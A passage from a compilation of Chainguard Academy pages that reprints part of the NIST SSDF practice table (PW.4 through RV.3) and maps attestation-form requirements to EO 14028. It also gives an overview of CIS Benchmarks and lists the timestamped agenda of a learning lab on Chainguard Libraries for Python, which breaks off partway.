tracking system, in the threat model). BSAFSS: TV.3BSIMM: AA1.1, AA1.2, AA1.3, AA2.1, AA3.1EO14028: 4e(iv), 4e(v), 4e(ix)IEC62443: SM-2, SR-2, SR-5, SD-3, SD-4, SI-2ISO27034: 7.3.3OWASPASVS: 1.1.5OWASPSAMM: DR1-A, DR1-BPCISSLC: 3.2SP800181: T0328; K0038, K0039, K0070, K0080, K0119, K0152, K0153, K0161, K0165, K0172, K0297; S0006, S0009, S0022, S0036, S0141, S0171 Reuse Existing, Well-Secured Software When Feasible Instead of Duplicating Functionality (PW.4): Lower the costs of software development, expedite software development, and decrease the likelihood of introducing additional security vulnerabilities into the software by reusing software modules and services that have already had their security posture checked. This is particularly important for software that implements security functionality, such as cryptographic modules and protocols. PW.4.1: Acquire and maintain well-secured software components (e.g., software libraries, modules, middleware, frameworks) from commercial, open-source, and other third-party developers for use by the organization’s software. Example 1: Review and evaluate third-party software components in the context of their expected use. If a component is to be used in a substantially different way in the future, perform the review and evaluation again with that new context in mind.Example 2: Determine secure configurations for software components, and make these available (e.g., as configuration-as-code) so developers can readily use the configurations.Example 3: Obtain provenance information (e.g., SBOM, source composition analysis, binary software composition analysis) for each software component, and analyze that information to better assess the risk that the component may introduce.Example 4: Establish one or more software repositories to host sanctioned and vetted open-source components.Example 5: Maintain a list of organization-approved commercial software components and component versions along with their provenance data.Example 6: Designate which components must be included in software to be developed.Example 7: Implement processes to update deployed software components to newer versions, and retain older versions of software components until all transitions from those versions have been completed successfully.Example 8: If the integrity or provenance of acquired binaries cannot be confirmed, build binaries from source code after verifying the source code’s integrity and provenance. BSAFSS: SM.2BSIMM: SFD2.1, SFD3.2, SR2.4, SR3.1, SE3.6CNCFSSCP: Securing Materials—VerificationEO14028: 4e(iii), 4e(vi), 4e(ix), 4e(x)IDASOAR: 19IEC62443: SM-9, SM-10MSSDL: 6NISTCSF: ID.SC-2OWASPASVS: 1.1.6OWASPSAMM: SA1-AOWASPSCVS: 4SCSIC: Vendor Sourcing Integrity ControlsSCTPC: MAINTAINSP80053: SA-4, SA-5, SA-8(3), SA-10(6), SR-3, SR-4SP800161: SA-4, SA-5, SA-8(3), SA-10(6), SR-3, SR-4SP800181: K0039 PW.4.2: Create and maintain well-secured software components in-house following SDLC processes to meet common internal software development needs that cannot be better met by third-party software components. Example 1: Follow organization-established security practices for secure software development when creating and maintaining the components.Example 2: Determine secure configurations for software components, and make these available (e.g., as configuration-as-code) so developers can readily use the configurations.Example 3: Maintain one or more software repositories for these components.Example 4: Designate which components must be included in software to be developed.Example 5: Implement processes to update deployed software components to newer versions, and maintain older versions of software components until all transitions from those versions have been completed successfully. BSIMM: SFD1.1, SFD2.1, SFD3.2, SR1.1EO14028: 4e(ix)IDASOAR: 19OWASPASVS: 1.1.6SCTPC: MAINTAINSP80053: SA-8(3)SP800161: SA-8(3)SP800181: SP-DEV-001 PW.4.4: Verify that acquired commercial, open-source, and all other third-party software components comply with the requirements, as defined by the organization, throughout their life cycles. Example 1: Regularly check whether there are publicly known vulnerabilities in the software modules and services that vendors have not yet fixed.Example 2: Build into the toolchain automatic detection of known vulnerabilities in software components.Example 3: Use existing results from commercial services for vetting the software modules and services.Example 4: Ensure that each software component is still actively maintained and has not reached end of life; this should include new vulnerabilities found in the software being remediated.Example 5: Determine a plan of action for each software component that is no longer being maintained or will not be available in the near future.Example 6: Confirm the integrity of software components through digital signatures or other mechanisms.Example 7: Review, analyze, and/or test code. See PW.7 and PW.8. BSAFSS: SC.3-1, SM.2-1, SM.2-2, SM.2-3, TV.2, TV.3BSIMM: CP3.2, SR2.4, SR3.1, SR3.2, SE2.4, SE3.6CNCFSSCP: Securing Materials—Verification, AutomationEO14028: 4e(iii), 4e(iv), 4e(vi), 4e(ix), 4e(x)IDASOAR: 21IEC62443: SI-1, SM-9, SM-10, DM-1IR8397: 2.11MSSDL: 7NISTCSF: ID.SC-4, PR.DS-6NISTLABEL: 2.2.2.2OWASPASVS: 10, 14.2OWASPMASVS: 7.5OWASPSAMM: TA3-A, SR3-BOWASPSCVS: 4, 5, 6PCISSLC: 3.2, 3.4, 4.1SCAGILE: Tasks Requiring the Help of Security Experts 8SCFPSSD: Manage Security Risk Inherent in the Use of Third-Party ComponentsSCSIC: Vendor Sourcing Integrity Controls, Peer Reviews and Security TestingSCTPC: MAINTAIN, ASSESSSP80053: SA-9, SR-3, SR-4, SR-4(3), SR-4(4)SP800160: 3.1.2, 3.3.8SP800161: SA-4, SA-8, SA-9, SA-9(3), SR-3, SR-4, SR-4(3), SR-4(4)SP800181: SP-DEV-002; K0153, K0266; S0298 Create Source Code by Adhering to Secure Coding Practices (PW.5): Decrease the number of security vulnerabilities in the software, and reduce costs by minimizing vulnerabilities introduced during source code creation that meet or exceed organization-defined vulnerability severity criteria. PW.5.1: Follow all secure coding practices that are appropriate to the development languages and environment to meet the organization’s requirements. Example 1: Validate all inputs, and validate and properly encode all outputs.Example 2: Avoid using unsafe functions and calls.Example 3: Detect errors, and handle them gracefully.Example 4: Provide logging and tracing capabilities.Example 5: Use development environments with automated features that encourage or require the use of secure coding practices with just-in-time training-in-place.Example 6: Follow procedures for manually ensuring compliance with secure coding practices when automated methods are insufficient or unavailable.Example 7: Use tools (e.g., linters, formatters) to standardize the style and formatting of the source code.Example 8: Check for other vulnerabilities that are common to the development languages and environment.Example 9: Have the developer review their own human-readable code to complement (not replace) code review performed by other people or tools. See PW.7. BSAFSS: SC.2, SC.3, LO.1, EE.1BSIMM: SR3.3, CR1.4, CR3.5EO14028: 4e(iv), 4e(ix)IDASOAR: 2IEC62443: SI-1, SI-2ISO27034: 7.3.5MSSDL: 9OWASPASVS: 1.1.7, 1.5, 1.7, 5, 7OWASPMASVS: 7.6SCFPSSD: Establish Log Requirements and Audit Practices, Use Code Analysis Tools to Find Security Issues Early, Handle Data Safely, Handle Errors, Use Safe Functions OnlySP800181: SP-DEV-001; T0013, T0077, T0176; K0009, K0016, K0039, K0070, K0140, K0624; S0019, S0060, S0149, S0172, S0266; A0036, A0047 Configure the Compilation, Interpreter, and Build Processes to Improve Executable Security (PW.6): Decrease the number of security vulnerabilities in the software and reduce costs by eliminating vulnerabilities before testing occurs. PW.6.1: Use compiler, interpreter, and build tools that offer features to improve executable security. Example 1: Use up-to-date versions of compiler, interpreter, and build tools.Example 2: Follow change management processes when deploying or updating compiler, interpreter, and build tools, and audit all unexpected changes to tools.Example 3: Regularly validate the authenticity and integrity of compiler, interpreter, and build tools. See PO.3. BSAFSS: DE.2-1BSIMM: SE2.4CNCFSSCP: Securing Build Pipelines—Verification, AutomationEO14028: 4e(iv), 4e(ix)IEC62443: SI-2MSSDL: 8SCAGILE: Operational Security Task 3SCFPSSD: Use Current Compiler and Toolchain Versions and Secure Compiler OptionsSCSIC: Vendor Software Development Integrity ControlsSP80053: SA-15SP800161: SA-15 PW.6.2: Determine which compiler, interpreter, and build tool features should be used and how each should be configured, then implement and use the approved configurations. Example 1: Enable compiler features that produce warnings for poorly secured code during the compilation process.Example 2: Implement the “clean build” concept, where all compiler warnings are treated as errors and eliminated except those determined to be false positives or irrelevant.Example 3: Perform all builds in a dedicated, highly controlled build environment.Example 4: Enable compiler features that randomize or obfuscate execution characteristics, such as memory location usage, that would otherwise be predictable and thus potentially exploitable.Example 5: Test to ensure that the features are working as expected and are not inadvertently causing any operational issues or other problems.Example 6: Continuously verify that the approved configurations are being used.Example 7: Make the approved tool configurations available as configuration-as-code so developers can readily use them. BSAFSS: DE.2-3, DE.2-4, DE.2-5BSIMM: SE2.4, SE3.2CNCFSSCP: Securing Build Pipelines—Verification, AutomationEO14028: 4e(iv), 4e(ix)IEC62443: SI-2IR8397: 2.5MSSDL: 8OWASPASVS: 14.1, 14.2.1OWASPMASVS: 7.2PCISSLC: 3.2SCAGILE: Operational Security Task 8SCFPSSD: Use Current Compiler and Toolchain Versions and Secure Compiler OptionsSCSIC: Vendor Software Development Integrity ControlsSP80053: SA-15, SR-9SP800161: SA-15, SR-9SP800181: K0039, K0070 Review and/or Analyze Human-Readable Code to Identify Vulnerabilities and Verify Compliance with Security Requirements (PW.7): Help identify vulnerabilities so that they can be corrected before the software is released to prevent exploitation. Using automated methods lowers the effort and resources needed to detect vulnerabilities. Human-readable code includes source code, scripts, and any other form of code that an organization deems human-readable. PW.7.1: Determine whether code review (a person looks directly at the code to find issues) and/or code analysis (tools are used to find issues in code, either in a fully automated way or in conjunction with a person) should be used, as defined by the organization. Example 1: Follow the organization’s policies or guidelines for when code review should be performed and how it should be conducted. This may include third-party code and reusable code modules written in-house.Example 2: Follow the organization’s policies or guidelines for when code analysis should be performed and how it should be conducted.Example 3: Choose code review and/or analysis methods based on the stage of the software. BSIMM: CR1.5EO14028: 4e(iv), 4e(ix)IEC62443: SM-5, SI-1, SVV-1NISTLABEL: 2.2.2.2SCSIC: Peer Reviews and Security TestingSP80053: SA-11SP800161: SA-11SP800181: SP-DEV-002; K0013, K0039, K0070, K0153, K0165; S0174 PW.7.2: Perform the code review and/or code analysis based on the organization’s secure coding standards, and record and triage all discovered issues and recommended remediations in the development team’s workflow or issue tracking system. Example 1: Perform peer review of code, and review any existing code review, analysis, or testing results as part of the peer review.Example 2: Use expert reviewers to check code for backdoors and other malicious content.Example 3: Use peer reviewing tools that facilitate the peer review process, and document all discussions and other feedback.Example 4: Use a static analysis tool to automatically check code for vulnerabilities and compliance with the organization’s secure coding standards with a human reviewing the issues reported by the tool and remediating them as necessary.Example 5: Use review checklists to verify that the code complies with the requirements.Example 6: Use automated tools to identify and remediate documented and verified unsafe software practices on a continuous basis as human-readable code is checked into the code repository.Example 7: Identify and document the root causes of discovered issues.Example 8: Document lessons learned from code review and analysis in a wiki that developers can access and search. BSAFSS: TV.2, PD.1-4BSIMM: CR1.2, CR1.4, CR1.6, CR2.6, CR2.7, CR3.4, CR3.5EO14028: 4e(iv), 4e(v), 4e(ix)IDASOAR: 3, 4, 5, 14, 15, 48IEC62443: SI-1, SVV-1, SVV-2IR8397: 2.3, 2.4ISO27034: 7.3.6MSSDL: 9, 10NISTLABEL: 2.2.2.2OWASPASVS: 1.1.7, 10OWASPMASVS: 7.5OWASPSAMM: IR1-B, IR2-A, IR2-B, IR3-APCISSLC: 3.2, 4.1SCAGILE: Operational Security Tasks 4, 7; Tasks Requiring the Help of Security Experts 10SCFPSSD: Use Code Analysis Tools to Find Security Issues Early, Use Static Analysis Security Testing Tools, Perform Manual Verification of Security Features/MitigationsSCSIC: Peer Reviews and Security TestingSP80053: SA-11, SA-11(1), SA-11(4), SA-15(7)SP800161: SA-11, SA-11(1), SA-11(4), SA-15(7)SP800181: SP-DEV-001, SP-DEV-002; T0013, T0111, T0176, T0267, T0516; K0009, K0039, K0070, K0140, K0624; S0019, S0060, S0078, S0137, S0149, S0167, S0174, S0242, S0266; A0007, A0015, A0036, A0044, A0047 Test Executable Code to Identify Vulnerabilities and Verify Compliance with Security Requirements (PW.8): Help identify vulnerabilities so that they can be corrected before the software is released in order to prevent exploitation. Using automated methods lowers the effort and resources needed to detect vulnerabilities and improves traceability and repeatability. Executable code includes binaries, directly executed bytecode and source code, and any other form of code that an organization deems executable. PW.8.1: Determine whether executable code testing should be performed to find vulnerabilities not identified by previous reviews, analysis, or testing and, if so, which types of testing should be used. Example 1: Follow the organization’s policies or guidelines for when code testing should be performed and how it should be conducted (e.g., within a sandboxed environment). This may include third-party executable code and reusable executable code modules written in-house.Example 2: Choose testing methods based on the stage of the software. BSAFSS: TV.3BSIMM: PT2.3EO14028: 4e(ix)IEC62443: SVV-1, SVV-2, SVV-3, SVV-4, SVV-5NISTLABEL: 2.2.2.2SCSIC: Peer Reviews and Security TestingSP80053: SA-11SP800161: SA-11SP800181: SP-DEV-001, SP-DEV-002; T0456; K0013, K0039, K0070, K0153, K0165, K0342, K0367, K0536, K0624; S0001, S0015, S0026, S0061, S0083, S0112, S0135 PW.8.2: Scope the testing, design the tests, perform the testing, and document the results, including recording and triaging all discovered issues and recommended remediations in the development team’s workflow or issue tracking system. Example 1: Perform robust functional testing of security features.Example 2: Integrate dynamic vulnerability testing into the project’s automated test suite.Example 3: Incorporate tests for previously reported vulnerabilities into the project’s test suite to ensure that errors are not reintroduced.Example 4: Take into consideration the infrastructures and technology stacks that the software will be used with in production when developing test plans.Example 5: Use fuzz testing tools to find issues with input handling.Example 6: If resources are available, use penetration testing to simulate how an attacker might attempt to compromise the software in high-risk scenarios.Example 7: Identify and record the root causes of discovered issues.Example 8: Document lessons learned from code testing in a wiki that developers can access and search.Example 9: Use source code, design records, and other resources when developing test plans. BSAFSS: TV.3, TV.5, PD.1-4BSIMM: ST1.1, ST1.3, ST1.4, ST2.4, ST2.5, ST2.6, ST3.3, ST3.4, ST3.5, ST3.6, PT1.1, PT1.2, PT1.3, PT3.1EO14028: 4e(iv), 4e(v), 4e(ix)IDASOAR: 7, 8, 10, 11, 38, 39, 43, 44, 48, 55, 56, 57IEC62443: SM-5, SM-13, SI-1, SVV-1, SVV-2, SVV-3, SVV-4, SVV-5IR8397: 2.6, 2.7, 2.8, 2.9, 2.10, 2.11ISO27034: 7.3.6MSSDL: 10, 11NISTLABEL: 2.2.2.2OWASPMASVS: 7.5OWASPSAMM: ST1-A, ST1-B, ST2-A, ST2-B, ST3-APCISSLC: 4.1SCAGILE: Operational Security Tasks 10, 11; Tasks Requiring the Help of Security Experts 4, 5, 6, 7SCFPSSD: Perform Dynamic Analysis Security Testing, Fuzz Parsers, Network Vulnerability Scanning, Perform Automated Functional Testing of Security Features/Mitigations, Perform Penetration TestingSCSIC: Peer Reviews and Security TestingSP80053: SA-11, SA-11(5), SA-11(8), SA-15(7)SP800161: SA-11, SA-11(5), SA-11(8), SA-15(7)SP800181: SP-DEV-001, SP-DEV-002; T0013, T0028, T0169, T0176, T0253, T0266, T0456, T0516; K0009, K0039, K0070, K0272, K0339, K0342, K0362, K0536, K0624; S0001, S0015, S0046, S0051, S0078, S0081, S0083, S0135, S0137, S0167, S0242; A0015 Configure Software to Have Secure Settings by Default (PW.9): Help improve the security of the software at the time of installation to reduce the likelihood of the software being deployed with weak security settings, putting it at greater risk of compromise. PW.9.1: Define a secure baseline by determining how to configure each setting that has an effect on security or a security-related setting so that the default settings are secure and do not weaken the security functions provided by the platform, network infrastructure, or services. Example 1: Conduct testing to ensure that the settings, including the default settings, are working as expected and are not inadvertently causing any security weaknesses, operational issues, or other problems. BSAFSS: CF.1BSIMM: SE2.2EO14028: 4e(iv), 4e(ix)IDASOAR: 23IEC62443: SD-4, SVV-1, SG-1ISO27034: 7.3.5SCAGILE: Tasks Requiring the Help of Security Experts 12SCSIC: Vendor Software Delivery Integrity Controls, Vendor Software Development Integrity ControlsSP800181: SP-DEV-002; K0009, K0039, K0073, K0153, K0165, K0275, K0531; S0167 PW.9.2: Implement the default settings (or groups of default settings, if applicable), and document each setting for software administrators. Example 1: Verify that the approved configuration is in place for the software.Example 2: Document each setting’s purpose, options, default value, security relevance, potential operational impact, and relationships with other settings.Example 3: Use authoritative programmatic technical mechanisms to record how each setting can be implemented and assessed by software administrators.Example 4: Store the default configuration in a usable format and follow change control practices for modifying it (e.g., configuration-as-code). BSAFSS: CF.1BSIMM: SE2.2EO14028: 4e(iv), 4e(ix)IDASOAR: 23IEC62443: SG-3OWASPSAMM: OE1-APCISSLC: 8.1, 8.2SCAGILE: Tasks Requiring the Help of Security Experts 12SCFPSSD: Verify Secure Configurations and Use of Platform MitigationSCSIC: Vendor Software Delivery Integrity Controls, Vendor Software Development Integrity ControlsSP80053: SA-5, SA-8(23)SP800161: SA-5, SA-8(23)SP800181: SP-DEV-001; K0009, K0039, K0073, K0153, K0165, K0275, K0531 Identify and Confirm Vulnerabilities on an Ongoing Basis (RV.1): Help ensure that vulnerabilities are identified more quickly so that they can be remediated more quickly in accordance with risk, reducing the window of opportunity for attackers. RV.1.1: Gather information from software acquirers, users, and public sources on potential vulnerabilities in the software and third-party components that the software uses, and investigate all credible reports. Example 1: Monitor vulnerability databases , security mailing lists, and other sources of vulnerability reports through manual or automated means.Example 2: Use threat intelligence sources to better understand how vulnerabilities in general are being exploited.Example 3: Automatically review provenance and software composition data for all software components to identify any new vulnerabilities they have. BSAFSS: VM.1-3, VM.3BSIMM: AM1.5, CMVM1.2, CMVM2.1, CMVM3.4, CMVM3.7CNCFSSCP: Securing Materials—VerificationEO14028: 4e(iv), 4e(vi), 4e(viii), 4e(ix)IEC62443: DM-1, DM-2, DM-3ISO29147: 6.2.1, 6.2.2, 6.2.4, 6.3, 6.5ISO30111: 7.1.3OWASPSAMM: IM1-A, IM2-B, EH1-BOWASPSCVS: 4PCISSLC: 3.4, 4.1, 9.1SCAGILE: Operational Security Task 5SCFPSSD: Vulnerability Response and DisclosureSCTPC: MONITOR1SP80053: SA-10, SR-3, SR-4SP800161: SA-10, SR-3, SR-4SP800181: K0009, K0038, K0040, K0070, K0161, K0362; S0078 RV.1.2: Review, analyze, and/or test the software’s code to identify or confirm the presence of previously undetected vulnerabilities. Example 1: Configure the toolchain to perform automated code analysis and testing on a regular or continuous basis for all supported releases.Example 2: See PW.7 and PW.8. BSAFSS: VM.1-2, VM.2-1BSIMM: CMVM3.1EO14028: 4e(iv), 4e(vi), 4e(viii), 4e(ix)IEC62443: SI-1, SVV-2, SVV-3, SVV-4, DM-1, DM-2ISO27034: 7.3.6ISO29147: 6.4ISO30111: 7.1.4PCISSLC: 3.4, 4.1SCAGILE: Operational Security Tasks 10, 11SP80053: SA-11SP800161: SA-11SP800181: SP-DEV-002; K0009, K0039, K0153 RV.1.3: Have a policy that addresses vulnerability disclosure and remediation, and implement the roles, responsibilities, and processes needed to support that policy. Example 1: Establish a vulnerability disclosure program, and make it easy for security researchers to learn about your program and report possible vulnerabilities.Example 2: Have a Product Security Incident Response Team (PSIRT) and processes in place to handle the responses to vulnerability reports and incidents, including communications plans for all stakeholders.Example 3: Have a security response playbook to handle a generic reported vulnerability, a report of zero-days, a vulnerability being exploited in the wild, and a major ongoing incident involving multiple parties and open-source software components.Example 4: Periodically conduct exercises of the product security incident response processes. BSAFSS: VM.1-1, VM.2BSIMM: CMVM1.1, CMVM2.1, CMVM3.3, CMVM3.7EO14028: 4e(viii), 4e(ix)IEC62443: DM-1, DM-2, DM-3, DM-4, DM-5ISO29147: AllISO30111: AllMSSDL: 12NISTLABEL: 2.2.2.3OWASPMASVS: 1.11OWASPSAMM: IM1-A, IM1-B, IM2-A, IM2-BPCISSLC: 9.2, 9.3SCFPSSD: Vulnerability Response and DisclosureSP80053: SA-15(10)SP800160: 3.3.8SP800161: SA-15(10)SP800181: K0041, K0042, K0151, K0292, K0317; S0054; A0025SP800216: All Assess, Prioritize, and Remediate Vulnerabilities (RV.2): Help ensure that vulnerabilities are remediated in accordance with risk to reduce the window of opportunity for attackers. RV.2.1: Analyze each vulnerability to gather sufficient information about risk to plan its remediation or other risk response. Example 1: Use existing issue tracking software to record each vulnerability.Example 2: Perform risk calculations for each vulnerability based on estimates of its exploitability, the potential impact if exploited, and any other relevant characteristics. BSAFSS: VM.2BSIMM: CMVM1.2, CMVM2.2EO14028: 4e(iv), 4e(viii), 4e(ix)IEC62443: DM-2, DM-3ISO30111: 7.1.4NISTLABEL: 2.2.2.2PCISSLC: 3.4, 4.2SCAGILE: Operational Security Task 1, Tasks Requiring the Help of Security Experts 10SP80053: SA-10, SA-15(7)SP800160: 3.3.8SP800161: SA-15(7)SP800181: K0009, K0039, K0070, K0161, K0165; S0078 RV.2.2: Plan and implement risk responses for vulnerabilities. Example 1: Make a risk-based decision as to whether each vulnerability will be remediated or if the risk will be addressed through other means (e.g., risk acceptance, risk transference), and prioritize any actions to be taken.Example 2: If a permanent mitigation for a vulnerability is not yet available, determine how the vulnerability can be temporarily mitigated until the permanent solution is available, and add that temporary remediation to the plan.Example 3: Develop and release security advisories that provide the necessary information to software acquirers, including descriptions of what the vulnerabilities are, how to find instances of the vulnerable software, and how to address them (e.g., where to get patches and what the patches change in the software; what configuration settings may need to be changed; how temporary workarounds could be implemented).Example 4: Deliver remediations to acquirers via an automated and trusted delivery mechanism. A single remediation could address multiple vulnerabilities.Example 5: Update records of design decisions, risk responses, and approved exceptions as needed. See PW.1.2. BSAFSS: VM.1-1, VM-2BSIMM: CMVM2.1EO14028: 4e(iv), 4e(vi), 4e(viii), 4e(ix)IEC62443: DM-4ISO30111: 7.1.4, 7.1.5NISTLABEL: 2.2.2.2PCISSLC: 4.1, 4.2, 10.1SCAGILE: Operational Security Task 2SCFPSSD: Fix the Vulnerability, Identify Mitigating Factors or WorkaroundsSCTPC: MITIGATESP80053: SA-5, SA-10, SA-11, SA-15(7)SP800160: 3.3.8SP800161: SA-5, SA-8, SA-10, SA-11, SA-15(7)SP800181: T0163, T0229, T0264; K0009, K0070 Analyze Vulnerabilities to Identify Their Root Causes (RV.3): Help reduce the frequency of vulnerabilities in the future. RV.3.1: Analyze identified vulnerabilities to determine their root causes. Example 1: Record the root cause of discovered issues.Example 2: Record lessons learned through root cause analysis in a wiki that developers can access and search. BSAFSS: VM.2-1BSIMM: CMVM3.1, CMVM3.2EO14028: 4e(ix)IEC62443: DM-3ISO30111: 7.1.4OWASPSAMM: IM3-APCISSLC: 4.2SCFPSSD: Secure Development Lifecycle FeedbackSP800181: T0047, K0009, K0039, K0070, K0343 RV.3.2: Analyze the root causes over time to identify patterns, such as a particular secure coding practice not being followed consistently. Example 1: Record lessons learned through root cause analysis in a wiki that developers can access and search.Example 2: Add mechanisms to the toolchain to automatically detect future instances of the root cause.Example 3: Update manual processes to detect future instances of the root cause. BSAFSS: VM.2-1, PD.1-3BSIMM: CP3.3, CMVM3.2EO14028: 4e(ix)IEC62443: DM-4ISO30111: 7.1.7OWASPSAMM: IM3-BPCISSLC: 2.6, 4.2SCFPSSD: Secure Development Lifecycle FeedbackSP800160: 3.3.8SP800181: T0111, K0009, K0039, K0070, K0343 RV.3.3: Review the software for similar vulnerabilities to eradicate a class of vulnerabilities, and proactively fix them rather than waiting for external reports. Example 1: See PW.7 and PW.8. BSAFSS: VM.2BSIMM: CR3.3, CMVM3.1EO14028: 4e(iv), 4e(viii), 4e(ix)IEC62443: SI-1, DM-3, DM-4ISO30111: 7.1.4PCISSLC: 4.2SP80053: SA-11SP800161: SA-11SP800181: SP-DEV-001, SP-DEV-002; K0009, K0039, K0070 RV.3.4: Review the SDLC process, and update it if appropriate to prevent (or reduce the likelihood of) the root cause recurring in updates to the software or in new software that is created. Example 1: Record lessons learned through root cause analysis in a wiki that developers can access and search.Example 2: Plan and implement changes to the appropriate SDLC practices. BSAFSS: PD.1-3BSIMM: CP3.3, CMVM3.2EO14028: 4e(ix)IEC62443: DM-6ISO30111: 7.1.7MSSDL: 2PCISSLC: 2.6, 4.2SCFPSSD: Secure Development Lifecycle FeedbackSP80053: SA-15SP800161: SA-15SP800181: K0009, K0039, K0070 References The SSDF Table was originally published at NIST SP 800-218: Secure Software Development Framework (SSDF) Version 1.1: Recommendations for Mitigating the Risk of Software Vulnerabilities. Reprinted courtesy of the National Institute of Standards and Technology, U.S. Department of Commerce. Not copyrightable in the United States. --- ### Minimum Attestation References URL: https://edu.chainguard.dev/software-security/secure-software-development/minimum-attestation-references/ Last Modified: May 10, 2023 Tags: Reference The minimum requirements within the Secure Software Attestation Form address requirements put forth in EO 14028 subsection (4)(e) and specific SSDF practices and tasks. For reference, please review the chart below. Attestation Requirements Related EO 14028 Subsection Related SSDF Practices and Tasks 1) The software was developed and built in secure environments. Those environments were secured by the following actions, at a minimum: 4e(i) [See rows below] a) Separating and protecting each environment involved in developing and building software; 4e(i)(A) PO.5.1 b) Regularly logging, monitoring, and auditing trust relationships used for authorization and access: i) to any software development and build environments; and ii) among components within each environment; 4e(i)(B) PO.5.1 c) Enforcing multi-factor authentication and conditional access across the environments relevant to developing and building software in a manner that minimizes security risk; 4e(i)(C) PO.5.1, PO.5.2 d) Taking consistent and reasonable steps to document, as well as minimize use or inclusion of software products that create undue risk, within the environments used to develop and build software; 4e(i)(D) PO.5.1 e) Encrypting sensitive data, such as credentials, to the extent practicable and based on risk; 4e(i)(E) PO.5.2 f) Implementing defensive cyber security practices, including continuous monitoring of operations and alerts and, as necessary, responding to suspected and confirmed cyber incidents; 4e(i)(F) PO.3.2, PO.3.3, PO.5.1, PO.5.2 2) The software producer has made a good-faith effort to maintain trusted source code supply chains by: a) Employing automated tools or comparable processes; and b) Establishing a process that includes reasonable steps to address the security of third-party components and manage related vulnerabilities; 4e(iii) PO 1.1, PO.3.1, PO.3.2, PO.5.1, PO.5.2, PS.1.1, PS.2.1, PS.3.1, PW.4.1, PW.4.4, PW 7.1, PW 8.1, RV 1.1 3) The software producer maintains provenance data for internal and third-party code incorporated into the software; 4e(vi) PO.1.3, PO.3.2, PO.5.1, PO.5.2, PS.3.1, PS.3.2, PW.4.1, PW.4.4, RV.1.1, RV.1.2 4) The software producer employed automated tools or comparable processes that check for security vulnerabilities. In addition: a) The software producer ensured these processes operate on an ongoing basis and, at a minimum, prior to product, version, or update releases and b) The software producer has a policy or process to address discovered security vulnerabilities prior to product release; and c) The software producer operates a vulnerability disclosure program and accepts, reviews, and addresses disclosed software vulnerabilities in a timely fashion. 4e(iv) PO.4.1, PO.4.2, PS.1.1, PW.2.1, PW.4.4, PW.5.1, PW.6.1, PW.6.2, PW.7.1, PW.7.2, PW.8.2, PW.9.1, PW.9.2. References Table of the references comes from the top of the original RFC PDF. Reprinted courtesy of the National Institute of Standards and Technology, U.S. Department of Commerce. Not copyrightable in the United States. --- ### Overview of CIS Benchmarks URL: https://edu.chainguard.dev/software-security/compliance/cis-benchmarks/ Last Modified: September 18, 2024 Tags: COMPLIANCE, STANDARDS The Center for Internet Security (CIS) is a nonprofit organization dedicated to enhancing the cybersecurity posture of organizations worldwide. Founded in 2000, CIS aims to develop best practices and guidelines that help organizations protect themselves against cyber threats. CIS’s mission is to foster collaboration among security professionals, policymakers, and industry leaders to safeguard both public and private organizations against cyber threats. One of the ways it does this is by publishing CIS Benchmarks: a set of recommendations that, when applied to a given tool, can help to harden it against threats. This conceptual article serves as a high-level overview of CIS Benchmarks. What are CIS Benchmarks? As mentioned in the introduction, CIS Benchmarks are a set of best practices and configuration guidelines designed to improve the security of various systems, applications, and networks. These benchmarks are widely recognized as authoritative standards for securing IT systems, and are developed through a consensus-driven process involving industry experts. CIS benchmarks cover a wide range of platforms, including operating systems, cloud providers, web browsers, network devices, and application software. Each benchmark provides detailed recommendations and prescriptive guidance on how to configure systems securely. They focus on areas such as user access controls, password policies, and network security settings. By following CIS benchmarks, organizations can significantly reduce their vulnerability to cyber threats. Additionally, many regulatory frameworks and standards recognize CIS benchmarks, making them useful for achieving compliance. You can find the full list of available CIS Benchmarks on the CIS website. Structure of CIS Benchmarks CIS Benchmarks are distributed as PDF documents from the CIS website at no cost. After completing the CIS Benchmarks PDF download form, you can access all the Benchmark documents. Note: By signing up for a CIS SecureSuite Membership you can download Benchmarks in a variety of other formats, including Word or Excel documents. CIS Benchmarks start with a brief overview of what they covers and lay out any typographical conventions or definitions specific to the Benchmark. They also define configuration profiles which can help users understand what recommendations they actually need to implement. For example, the CIS Google Chrome Benchmark has two profiles: Level 1 is for general use in Corporate/Enterprise environments and Level 2 is for High Security or Sensitive Data environments that only need limited functionality. In this case, Level 2 is an extension of Level 1; any recommendations for organizations that fit the Level 1 profile should also be implemented for Level 2 organizations, but not vice versa. The Benchmark will then go into individual recommendations relating to the tool it covers. These recommendations typically have the following fields: Profile Applicability: the configuration profile (mentioned above) which the recommendation applies to Description: a brief description of the recommendation Rationale: the reasoning for the recommendation, with details on how it can improve security Impact: the effect that implementing the recommendation would have on the tool’s default behavior Audit: details on how you can check whether the recommendation has been implemented Remediation: details on how to establish the recommended configuration Default Value: the tool’s default value, before the recommendation has been implemented References: a list of resources which informed CIS’s recommendation CIS Controls: the relevant CIS Controls for the recommendation Regarding this last bullet, CIS Controls are more high-level recommendations than Benchmarks. CIS Benchmarks are best practices for specific tools, while CIS Controls are more simplified general recommendations that can be applied to a variety of technologies. Learn more By implementing CIS benchmarks, organizations not only improve their security against evolving cyber threats but also align with regulatory standards, ensuring compliance and minimizing risks. To explore the full range of benchmarks and start implementing these best practices, visit the CIS website today. Additionally, you may find our resources on other compliance frameworks to be of interest. --- ### Chainguard Libraries for Python URL: https://edu.chainguard.dev/software-security/learning-labs/ll202506/ Last Modified: June 25, 2025 Tags: Learning Labs, Chainguard Libraries, Python The June 2025 Learning Lab with Patrick Smyth covers Chainguard Libraries for Python. Open source libraries help you move fast, but pulling in external dependencies can introduce supply chain risk. This session covers fundamental concepts of Chainguard Libraries, package managers and dependencies, PyPI and build tools, configuring repository managers, and running example application builds. Sections 0:00 Introduction and welcome 0:54 Patrick Smyth introduction and background 1:47 Chainguard! Who are we? 2:47 Chainguard Containers and the “boss assigned me to fix Ubuntu” problem 4:12 Introduction to Chainguard Libraries for Python 5:04 Python libraries fundamentals - modules, packages, and libraries 6:34 The dependency graph problem and modern ecosystem challenges 8:57 PyPI (Python Package Index) overview and infrastructure 10:53 Supply chain attacks on the rise and threats to the Python ecosystem 11:39 Supply chain meme calendar - an attack every month this year 13:54 Anatomy of supply chain attacks and attack vectors 17:43 Chainguard Libraries! 19:34 Chainguard Factory overview and operational security 21:33 Case study: Ultralytics YOLO December 2024 attack 23:22 Technical caveats and requirements for Chainguard Libraries 25:06 Demo introduction and Flask project overview 27:48 Accessing demo materials on Chainguard Academy 29:00 Demo: Cloning and setting up the Flask project 31:17 Demo: Creating virtual environment and installing from PyPI 33:06 Demo: Running Flask application and testing with libCheck tool 34:28 Demo: Configuring pip for Chainguard Libraries via repository manager 36:19 Demo: Installing dependencies from Chainguard 